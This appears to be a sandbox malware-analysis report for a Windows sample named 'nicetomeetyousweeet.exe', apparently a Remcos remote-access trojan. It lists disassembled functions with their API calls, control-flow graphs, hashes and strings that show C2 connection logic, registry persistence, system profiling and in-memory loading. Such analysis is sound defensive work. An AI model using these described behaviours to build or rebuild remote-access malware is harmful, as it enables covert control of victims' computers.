                                                                                Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                • API String ID: 2281282204-3981147832
                                                                                • Opcode ID: a495f52f6d12fdb69eb15e8af719d064a6023c8221cbc3bd1bda5ccd61591161
                                                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                • Opcode Fuzzy Hash: a495f52f6d12fdb69eb15e8af719d064a6023c8221cbc3bd1bda5ccd61591161
                                                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1263 404915-404924 1264 4049b1 1263->1264 1265 40492a-404931 1263->1265 1268 4049b3-4049b7 1264->1268 1266 404933-404937 1265->1266 1267 404939-404940 1265->1267 1269 404987-4049af CreateEventA CreateThread 1266->1269 1267->1269 1270 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1267->1270 1269->1268 1270->1269
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$EventLocalThreadTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 2532271599-1507639952
                                                                                • Opcode ID: d4f222445af10bae9fc578e1dd84de5f99209aed2f8721c4e23f231093fcca0f
                                                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                • Opcode Fuzzy Hash: d4f222445af10bae9fc578e1dd84de5f99209aed2f8721c4e23f231093fcca0f
                                                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID:
                                                                                • API String ID: 1815803762-0
                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$ComputerUser
                                                                                • String ID:
                                                                                • API String ID: 4229901323-0
                                                                                • Opcode ID: ed216285d6bfdcac9a638f4fe4a7e0c681483f792ab1cbe08182ae81c23a0ae2
                                                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                • Opcode Fuzzy Hash: ed216285d6bfdcac9a638f4fe4a7e0c681483f792ab1cbe08182ae81c23a0ae2
                                                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                Function 00413FD4 Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 813sleepnetworkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 582 414b54-414b66 call 4047eb call 4020b4 559->582 565 4142ca-4142df call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 581 4142e5-4143c3 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc 565->581 565->582 566->582 632 4143c8-414432 call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 581->632 595 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 582->595 596 414b8e-414b96 call 401d8c 582->596 595->596 596->476 647 414434-414441 call 40541d 632->647 648 414446-41446d call 401e8f call 412513 632->648 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->582
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                • WSAGetLastError.WS2_32 ref: 00414249
                                                                                • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-GJDISH$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                • API String ID: 524882891-2814136433
                                                                                • Opcode ID: 8058ea3990e45dd0313c4cff3eee3b297f86610f98fd31dfb78e3f8a2bfd2f01
                                                                                • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                • Opcode Fuzzy Hash: 8058ea3990e45dd0313c4cff3eee3b297f86610f98fd31dfb78e3f8a2bfd2f01
                                                                                • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • connect.WS2_32(?,006BB748,00000010), ref: 004042A5
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                • API String ID: 994465650-2151626615
                                                                                • Opcode ID: c561125659aae0c09ea28a7821dc0bf5602007b287621a04134ad895a3bd37cf
                                                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                • Opcode Fuzzy Hash: c561125659aae0c09ea28a7821dc0bf5602007b287621a04134ad895a3bd37cf
                                                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                • String ID:
                                                                                • API String ID: 3658366068-0
                                                                                • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1022 40c8d0-40c8d5 1019->1022 1023 40c9c2-40c9c7 1019->1023 1024 40c905-40c90a 1019->1024 1025 40c9d8 1019->1025 1026 40c9c9-40c9ce call 43ac0f 1019->1026 1027 40c8da-40c8e8 call 41a74b call 401e18 1019->1027 1028 40c8fb-40c900 1019->1028 1029 40c9bb-40c9c0 1019->1029 1030 40c90f-40c916 call 41b15b 1019->1030 1041 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1041 1032 40c9dd-40c9e2 call 43ac0f 1022->1032 1023->1032 1024->1032 1025->1032 1038 40c9d3-40c9d6 1026->1038 1050 40c8ed 1027->1050 1028->1032 1029->1032 1042 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1042 1043 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1043 1044 40c9e3-40c9e8 call 4082d7 1032->1044 1038->1025 1038->1044 1055 40c8f1-40c8f6 call 401e13 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                • API String ID: 82841172-425784914
                                                                                • Opcode ID: c40a772e0e925007f02d667aca04cc94c71f8078b9392a0811ef0e32d8b09b5b
                                                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                • Opcode Fuzzy Hash: c40a772e0e925007f02d667aca04cc94c71f8078b9392a0811ef0e32d8b09b5b
                                                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                Function 0078003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1098 78003c-780047 1099 780049 1098->1099 1100 78004c-780263 call 780a3f call 780e0f call 780d90 VirtualAlloc 1098->1100 1099->1100 1115 78028b-780292 1100->1115 1116 780265-780289 call 780a69 1100->1116 1118 7802a1-7802b0 1115->1118 1120 7802ce-7803c2 VirtualProtect call 780cce call 780ce7 1116->1120 1118->1120 1121 7802b2-7802cc 1118->1121 1127 7803d1-7803e0 1120->1127 1121->1118 1128 780439-7804b8 VirtualFree 1127->1128 1129 7803e2-780437 call 780ce7 1127->1129 1130 7804be-7804cd 1128->1130 1131 7805f4-7805fe 1128->1131 1129->1127 1134 7804d3-7804dd 1130->1134 1135 78077f-780789 1131->1135 1136 780604-78060d 1131->1136 1134->1131 1140 7804e3-780505 LoadLibraryA 1134->1140 1138 78078b-7807a3 1135->1138 1139 7807a6-7807b0 1135->1139 1136->1135 1141 780613-780637 1136->1141 1138->1139 1142 78086e-7808be LoadLibraryA 1139->1142 1143 7807b6-7807cb 1139->1143 1144 780517-780520 1140->1144 1145 780507-780515 1140->1145 1146 78063e-780648 1141->1146 1150 7808c7-7808f9 1142->1150 1147 7807d2-7807d5 1143->1147 1148 780526-780547 1144->1148 1145->1148 1146->1135 1149 78064e-78065a 1146->1149 1151 780824-780833 1147->1151 1152 7807d7-7807e0 1147->1152 1153 78054d-780550 1148->1153 1149->1135 1154 780660-78066a 1149->1154 1155 7808fb-780901 1150->1155 1156 780902-78091d 1150->1156 1162 780839-78083c 1151->1162 1157 7807e2 1152->1157 1158 7807e4-780822 1152->1158 1159 7805e0-7805ef 1153->1159 1160 780556-78056b 1153->1160 1161 78067a-780689 1154->1161 1155->1156 1157->1151 1158->1147 1159->1134 1163 78056d 1160->1163 1164 78056f-78057a 1160->1164 1165 78068f-7806b2 1161->1165 1166 780750-78077a 1161->1166 1162->1142 1167 78083e-780847 1162->1167 1163->1159 1169 78059b-7805bb 1164->1169 1170 78057c-780599 1164->1170 1171 7806ef-7806fc 1165->1171 1172 7806b4-7806ed 1165->1172 1166->1146 1173 780849 1167->1173 1174 78084b-78086c 1167->1174 1181 7805bd-7805db 1169->1181 1170->1181 1175 78074b 1171->1175 1176 7806fe-780748 1171->1176 1172->1171 1173->1142 1174->1162 1175->1161 1176->1175 1181->1153
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0078024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 11e41495bae7d7e4d724454cbfe7a509fbcdab37b2827ee2bc84ff87f4a961b5
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 19527974A01229DFDBA4CF58C984BA8BBB1BF09304F1480D9E50DAB351DB34AE99DF54
                                                                                Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 782494840-2070987746
                                                                                • Opcode ID: 0f840801c1757ac233eadf91f42c37311e9c1d9dac439ea88a97dfd6c29ab248
                                                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                • Opcode Fuzzy Hash: 0f840801c1757ac233eadf91f42c37311e9c1d9dac439ea88a97dfd6c29ab248
                                                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1253 4126d2-4126e9 RegCreateKeyA 1254 412722 1253->1254 1255 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1253->1255 1257 412724-412730 call 401eea 1254->1257 1255->1257
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: HgF$pth_unenc
                                                                                • API String ID: 1818849710-3662775637
                                                                                • Opcode ID: 7bba4fca9e91e474f2300f61649ee5aed28a721c6f9292861d9dcd206a4cf4dc
                                                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                • Opcode Fuzzy Hash: 7bba4fca9e91e474f2300f61649ee5aed28a721c6f9292861d9dcd206a4cf4dc
                                                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1280 4127d5-4127eb RegCreateKeyA 1281 412818-41281b 1280->1281 1282 4127ed-412812 RegSetValueExA RegCloseKey 1280->1282 1282->1281 1283 412814-412817 1282->1283
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: TUF
                                                                                • API String ID: 1818849710-3431404234
                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1284 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                APIs
